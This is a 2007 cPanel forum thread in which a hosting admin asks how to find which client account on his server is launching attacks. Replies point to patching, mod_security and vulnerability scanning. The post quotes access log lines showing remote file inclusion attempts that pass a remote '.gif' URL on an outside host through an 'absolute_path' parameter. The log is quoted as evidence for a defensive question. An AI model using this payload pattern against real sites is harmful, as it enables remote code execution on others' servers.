The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

HELP - Need help identifying what user is doing something

Discussion in 'General Discussion' started by n000b, May 30, 2007.

  1. n000b

    n000b Well-Known Member

    Joined:
    Apr 7, 2005
    Messages:
    142
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    My dedicated server provider just sent me a policy enforcement notice, apparently someone on my server is trying to hack/crack another website. They sent me this:
    <my ip> - - [30/May/2007:14:12:14 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"

    <my ip> - - [30/May/2007:14:12:29 +0200] "GET /~goober/n0h4x0rz/components/com_minibb.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"

    <my ip> - - [30/May/2007:14:12:43 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
    <my ip> - - [30/May/2007:14:15:08 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"


    They are from the server that is being hacked/cracked.


    How/where do I look to find out who is doing this on my server?

    Thanks :)
     
  2. approx

    approx Well-Known Member

    Joined:
    Mar 6, 2007
    Messages:
    59
    Likes Received:
    0
    Trophy Points:
    6
    1 of your client is cracked. tell them to update the patch of the software that he used. Don't you install mod_security?
     
  3. n000b

    n000b Well-Known Member

    Joined:
    Apr 7, 2005
    Messages:
    142
    Likes Received:
    0
    Trophy Points:
    16
    Hi,

    Thanks, I know one of the clients has been cracked - I'm trying to figure out which client! :)

    Edit: would the server even keep logs of outgoing requests? I'm completely lost on how to track this issue!
     
    #3 n000b, May 31, 2007
    Last edited: May 31, 2007
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    This can be easily accomplished by using a program or a script to scan your server and report vulnerable scripts. We have our own; this thread might help: http://forums.cpanel.net/showthread.php?t=62821
     
Loading...

Share This Page